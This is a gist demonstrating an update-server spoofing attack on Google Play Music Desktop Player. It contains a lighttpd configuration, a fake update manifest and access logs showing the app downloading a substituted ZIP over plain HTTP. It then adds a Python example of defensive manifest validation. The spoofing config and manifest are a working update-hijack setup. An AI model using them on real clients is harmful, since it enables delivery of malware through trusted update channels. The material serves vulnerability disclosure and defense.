@chtzvt
Last active September 19, 2017 17:16
GPMDP update server spoofing
$HTTP["host"] =~ "update.googleplaymusicdesktopplayer.com" {
    server.document-root = "/var/www/hosts/gpmdp/"

    # Any OS X update poll is answered with the canned manifest (fake.json)
    $HTTP["url"] =~ "^/update/osx/" {
        server.document-root = "/var/www/hosts/gpmdp/fake.json"
    }

    # The root URL imitates the real server, which redirects to the Windows installer on GitHub
    $HTTP["url"] == "/" {
        url.redirect-code = 302
        url.redirect = (
            "" => "https://github.com/MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-/releases/download/3.0.1/Google.Play.Music.Desktop.Player.x86.exe"
        )
    }

    # The download link named in fake.json redirects to the ZIP served from this host
    $HTTP["url"] =~ "^/download/version/" {
        url.redirect-code = 302
        url.redirect = (
            "" => "http://update.googleplaymusicdesktopplayer.com/download/Google.Play.Music.Desktop.Player.OSX.zip"
        )
    }
}

# Client behavior when connecting to the malicious update server (from the lighttpd access log):

# 1. GPMDP polls the root of the update server (we serve a 302 to the Windows .exe to imitate the real server)
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET / HTTP/1.1" 302 0 "-" "-"

# 2. GPMDP loads the JSON manifest from the fake update server
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /update/osx/3.0.1 HTTP/1.1" 200 247 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"

# 3. GPMDP parses our fake manifest and follows our "evil" link :^)
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /download/version/3.0.7/osx_64?filetype=zip HTTP/1.1" 302 0 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"

# 4. GPMDP downloads the "latest" fake version from our update server!
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:36 -0400] "GET /download/Google.Play.Music.Desktop.Player.OSX.zip HTTP/1.1" 200 50647108 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)"

# Contents of fake.json:
# {
# "url":"http://update.googleplaymusicdesktopplayer.com/download/version/3.0.7/osx_64?filetype=zip",
# "name":"3.0.7",
# "notes":"This is a fake release of GPMDP that contains malicious content!",
# "pub_date":"2016-03-12T02:53:45.000Z"
# }

# The update ZIP served here was just the latest version of GPMDP.
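The log above shows why the spoof works: the client fetches a plain-HTTP manifest (the same `url`/`name`/`notes`/`pub_date` fields as a Squirrel.Mac feed), trusts it as-is, and installs whatever the `url` points at. The following is an added example, not code from the gist or from the GPMDP project, of the checks an update client can apply to such a manifest before following it: the manifest and the artifact must both come over HTTPS, the artifact host must be on an allowlist, the advertised version must be newer than the running one, and the manifest must carry a SHA-256 digest that the downloaded bytes are checked against. The `sha256` field, the trusted-host list, and the sample artifact bytes are assumptions constructed for this example; the gist's fake.json has no digest field, which is one of the reasons it is rejected.

```python
"""Defensive validation of a Squirrel-style update manifest (added example)."""
import hashlib
import json
import re
from urllib.parse import urlsplit

# Constructed allowlist: hosts the client will accept update artifacts from.
TRUSTED_HOSTS = {"update.googleplaymusicdesktopplayer.com"}

# Manifest body copied from the gist's fake.json, used here as test input.
FAKE_JSON = """{
"url":"http://update.googleplaymusicdesktopplayer.com/download/version/3.0.7/osx_64?filetype=zip",
"name":"3.0.7",
"notes":"This is a fake release of GPMDP that contains malicious content!",
"pub_date":"2016-03-12T02:53:45.000Z"
}"""

# Constructed artifact and a manifest that does carry its digest (assumed "sha256" field).
SAMPLE_ARTIFACT = b"constructed zip bytes standing in for a real release"
GOOD_JSON = json.dumps({
    "url": "https://update.googleplaymusicdesktopplayer.com/download/version/3.0.7/osx_64?filetype=zip",
    "name": "3.0.7",
    "notes": "constructed release used by the example",
    "pub_date": "2016-03-12T02:53:45.000Z",
    "sha256": hashlib.sha256(SAMPLE_ARTIFACT).hexdigest(),
})

_VERSION_RE = re.compile(r"^\d+(\.\d+)*$")


def parse_version(text):
    """Turn '3.0.7' into (3, 0, 7); reject anything that is not dotted digits."""
    if not _VERSION_RE.match(text):
        raise ValueError(f"malformed version: {text!r}")
    return tuple(int(part) for part in text.split("."))


def manifest_violations(manifest, current_version, trusted_hosts=TRUSTED_HOSTS):
    """Return policy violations for a parsed manifest; an empty list means acceptable."""
    problems = []
    parts = urlsplit(manifest.get("url", ""))
    if parts.scheme != "https":
        problems.append("artifact url must use https")
    if parts.hostname not in trusted_hosts:
        problems.append(f"artifact host {parts.hostname!r} is not trusted")
    name = manifest.get("name", "")
    try:
        # Refuse same-version and downgrade "updates", not just malformed ones.
        if parse_version(name) <= parse_version(current_version):
            problems.append(f"advertised version {name} is not newer than {current_version}")
    except ValueError as exc:
        problems.append(str(exc))
    if not re.fullmatch(r"[0-9a-f]{64}", manifest.get("sha256", "")):
        problems.append("manifest lacks a sha256 digest for the artifact")
    return problems


def artifact_matches(data, expected_sha256):
    """True only if the downloaded bytes hash to the digest the manifest promised."""
    return hashlib.sha256(data).hexdigest() == expected_sha256.lower()


def evaluate(manifest_url, manifest_text, current_version, artifact=None):
    """Decide whether an update described by manifest_text may be installed.

    manifest_url is the URL the manifest itself was fetched from; the gist's
    client fetched it over plain HTTP, which this check alone would have caught.
    """
    problems = []
    if urlsplit(manifest_url).scheme != "https":
        problems.append("manifest must be fetched over https")
    manifest = json.loads(manifest_text)
    problems += manifest_violations(manifest, current_version)
    if not problems and artifact is not None and not artifact_matches(artifact, manifest["sha256"]):
        problems.append("downloaded artifact does not match manifest digest")
    return problems


if __name__ == "__main__":
    # Path taken from the gist's log line for the manifest poll.
    poll_url = "http://update.googleplaymusicdesktopplayer.com/update/osx/3.0.1"
    print("fake.json:", evaluate(poll_url, FAKE_JSON, "3.0.1"))
    print("good manifest:", evaluate("https://update.example/update/osx/3.0.1", GOOD_JSON, "3.0.1", SAMPLE_ARTIFACT))
```

The digest check only binds the artifact to the manifest; it authenticates nothing on its own. What makes the scheme hold up is that the manifest arrives over TLS from a host the client validates (or carries a signature the client verifies with a pinned public key), so an attacker who can answer for `update.googleplaymusicdesktopplayer.com` on the local network, as in the gist, cannot substitute both the manifest and the artifact.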